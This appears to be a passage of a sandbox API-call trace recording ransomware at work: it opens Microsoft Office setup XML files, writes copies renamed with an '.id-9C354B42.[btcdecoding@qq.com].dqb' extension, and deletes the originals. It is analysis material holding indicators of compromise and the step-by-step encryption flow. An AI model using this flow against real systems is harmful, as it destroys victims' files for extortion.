lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0037.351] lstrlenW (lpString=".bz2") returned 4 [0037.351] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0037.351] lstrlenW (lpString=".7z") returned 3 [0037.351] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0037.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0037.351] lstrlenW (lpString=".dbf") returned 4 [0037.351] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0037.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0037.351] lstrlenW (lpString=".1cd") returned 4 [0037.351] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0037.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0037.351] lstrlenW (lpString=".jpg") returned 4 [0037.351] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0037.352] lstrcmpiW (lpString1=".XML", lpString2=".dqb") returned 1 [0037.352] lstrlenW (lpString="SETUP.XML") returned 9 [0037.352] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0037.352] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=2296) returned 1 [0037.352] CloseHandle (hObject=0x174) returned 1 [0037.353] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml")) returned 0x20 [0037.353] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0037.353] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0037.353] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.353] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.353] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0037.355] GetLastError () returned 0x0 [0037.355] ReadFile (in: hFile=0x174, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x8f8, lpOverlapped=0x0) returned 1 [0037.356] WriteFile (in: hFile=0x1a4, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x900, lpOverlapped=0x0) returned 1 [0037.357] ReadFile (in: hFile=0x174, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0037.357] WriteFile (in: hFile=0x1a4, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0037.357] SetEndOfFile (hFile=0x1a4) returned 1 [0037.357] CloseHandle (hObject=0x1a4) returned 1 [0037.358] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.358] SetEndOfFile (hFile=0x174) returned 1 [0037.359] CloseHandle (hObject=0x174) returned 1 [0037.359] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0037.359] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml")) returned 1 [0037.359] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0037.359] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0037.359] lstrlenW (lpString=".doc") returned 4 [0037.359] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0037.359] lstrlenW (lpString=".docx") returned 5 [0037.359] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0037.359] lstrlenW (lpString=".pdf") returned 4 [0037.359] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0037.359] lstrlenW (lpString=".xls") returned 4 [0037.359] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0037.359] lstrlenW (lpString=".xlsx") returned 5 [0037.359] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0037.359] lstrlenW (lpString=".ppt") returned 4 [0037.359] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0037.360] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0037.360] lstrlenW (lpString=".zip") returned 4 [0037.360] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0037.360] lstrlenW (lpString=".rar") returned 4 [0037.360] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0037.360] lstrlenW (lpString=".bz2") returned 4 [0037.360] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0037.360] lstrlenW (lpString=".7z") returned 3 [0037.360] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0037.360] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0037.360] lstrlenW (lpString=".dbf") returned 4 [0037.360] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0037.360] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0037.360] lstrlenW (lpString=".1cd") returned 4 [0037.360] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0037.360] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0037.360] lstrlenW (lpString=".jpg") returned 4 [0037.360] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0037.360] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0037.360] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0037.360] lstrlenW (lpString=".doc") returned 4 [0037.360] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0037.360] lstrlenW (lpString=".docx") returned 5 [0037.360] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0037.360] lstrlenW (lpString=".pdf") returned 4 [0037.360] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0037.360] lstrlenW (lpString=".xls") returned 4 [0037.360] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0037.360] lstrlenW (lpString=".xlsx") returned 5 [0037.360] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0037.360] lstrlenW (lpString=".ppt") returned 4 [0037.360] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0037.360] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0037.360] lstrlenW (lpString=".zip") returned 4 [0037.360] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0037.361] lstrlenW (lpString=".rar") returned 4 [0037.361] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0037.361] lstrlenW (lpString=".bz2") returned 4 [0037.361] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0037.361] lstrlenW (lpString=".7z") returned 3 [0037.361] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0037.361] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0037.361] lstrlenW (lpString=".dbf") returned 4 [0037.361] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0037.361] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0037.361] lstrlenW (lpString=".1cd") returned 4 [0037.361] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0037.361] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0037.361] lstrlenW (lpString=".jpg") returned 4 [0037.361] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0037.361] lstrcmpiW (lpString1=".XML", lpString2=".dqb") returned 1 [0037.361] lstrlenW (lpString="GrooveMUI.XML") returned 13 [0037.361] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0037.361] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=913) returned 1 [0037.361] CloseHandle (hObject=0x174) returned 1 [0037.362] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml")) returned 0x20 [0037.362] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0037.362] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0037.362] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.362] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.362] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0038.720] GetLastError () returned 0x0 [0038.720] ReadFile (in: hFile=0x174, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x391, lpOverlapped=0x0) returned 1 [0038.839] WriteFile (in: hFile=0x1a4, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x3a0, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x3a0, lpOverlapped=0x0) returned 1 [0038.840] ReadFile (in: hFile=0x174, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0038.840] WriteFile (in: hFile=0x1a4, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xee, lpOverlapped=0x0) returned 1 [0038.840] SetEndOfFile (hFile=0x1a4) returned 1 [0038.840] CloseHandle (hObject=0x1a4) returned 1 [0038.841] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.841] SetEndOfFile (hFile=0x174) returned 1 [0038.842] CloseHandle (hObject=0x174) returned 1 [0038.842] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0038.842] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml")) returned 1 [0038.842] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0038.842] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0038.842] lstrlenW (lpString=".doc") returned 4 [0038.843] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0038.843] lstrlenW (lpString=".docx") returned 5 [0038.843] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0038.843] lstrlenW (lpString=".pdf") returned 4 [0038.843] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0038.843] lstrlenW (lpString=".xls") returned 4 [0038.843] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0038.843] lstrlenW (lpString=".xlsx") returned 5 [0038.843] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0038.843] lstrlenW (lpString=".ppt") returned 4 [0038.843] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0038.843] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0038.843] lstrlenW (lpString=".zip") returned 4 [0038.843] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0038.843] lstrlenW (lpString=".rar") returned 4 [0038.843] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0038.843] lstrlenW (lpString=".bz2") returned 4 [0038.843] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0038.843] lstrlenW (lpString=".7z") returned 3 [0038.843] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0038.843] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0038.843] lstrlenW (lpString=".dbf") returned 4 [0038.843] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0038.843] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0038.843] lstrlenW (lpString=".1cd") returned 4 [0038.843] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0038.843] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0038.843] lstrlenW (lpString=".jpg") returned 4 [0038.843] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0038.843] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0038.843] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0038.843] lstrlenW (lpString=".doc") returned 4 [0038.843] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0038.843] lstrlenW (lpString=".docx") returned 5 [0038.844] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0038.844] lstrlenW (lpString=".pdf") returned 4 [0038.844] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0038.844] lstrlenW (lpString=".xls") returned 4 [0038.844] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0038.844] lstrlenW (lpString=".xlsx") returned 5 [0038.844] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0038.844] lstrlenW (lpString=".ppt") returned 4 [0038.844] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0038.844] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0038.844] lstrlenW (lpString=".zip") returned 4 [0038.844] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0038.844] lstrlenW (lpString=".rar") returned 4 [0038.844] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0038.844] lstrlenW (lpString=".bz2") returned 4 [0038.844] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0038.844] lstrlenW (lpString=".7z") returned 3 [0038.844] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0038.844] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0038.844] lstrlenW (lpString=".dbf") returned 4 [0038.844] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0038.844] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0038.844] lstrlenW (lpString=".1cd") returned 4 [0038.844] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0038.844] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0038.844] lstrlenW (lpString=".jpg") returned 4 [0038.844] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0038.844] lstrcmpiW (lpString1=".XML", lpString2=".dqb") returned 1 [0038.844] lstrlenW (lpString="SETUP.XML") returned 9 [0038.844] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0039.195] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=2362) returned 1 [0039.195] CloseHandle (hObject=0x1e4) returned 1 [0039.195] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml")) returned 0x20 [0039.195] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0039.195] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0039.195] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.195] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.195] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0039.477] GetLastError () returned 0x0 [0039.477] ReadFile (in: hFile=0x1e4, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x93a, lpOverlapped=0x0) returned 1 [0039.849] WriteFile (in: hFile=0x19c, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x940, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x940, lpOverlapped=0x0) returned 1 [0039.850] ReadFile (in: hFile=0x1e4, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0039.850] WriteFile (in: hFile=0x19c, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0039.850] SetEndOfFile (hFile=0x19c) returned 1 [0039.850] CloseHandle (hObject=0x19c) returned 1 [0039.851] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.851] SetEndOfFile (hFile=0x1e4) returned 1 [0039.851] CloseHandle (hObject=0x1e4) returned 1 [0039.852] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0039.852] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml")) returned 1 [0039.852] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0039.852] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0039.852] lstrlenW (lpString=".doc") returned 4 [0039.852] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0039.852] lstrlenW (lpString=".docx") returned 5 [0039.852] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0039.852] lstrlenW (lpString=".pdf") returned 4 [0039.852] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0039.852] lstrlenW (lpString=".xls") returned 4 [0039.852] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0039.852] lstrlenW (lpString=".xlsx") returned 5 [0039.852] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0039.852] lstrlenW (lpString=".ppt") returned 4 [0039.852] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0039.852] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0039.852] lstrlenW (lpString=".zip") returned 4 [0039.852] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0039.852] lstrlenW (lpString=".rar") returned 4 [0039.852] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0039.852] lstrlenW (lpString=".bz2") returned 4 [0039.852] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0039.853] lstrlenW (lpString=".7z") returned 3 [0039.853] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0039.853] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0039.853] lstrlenW (lpString=".dbf") returned 4 [0039.853] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0039.853] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0039.853] lstrlenW (lpString=".1cd") returned 4 [0039.853] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0039.853] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0039.853] lstrlenW (lpString=".jpg") returned 4 [0039.853] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0039.853] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft 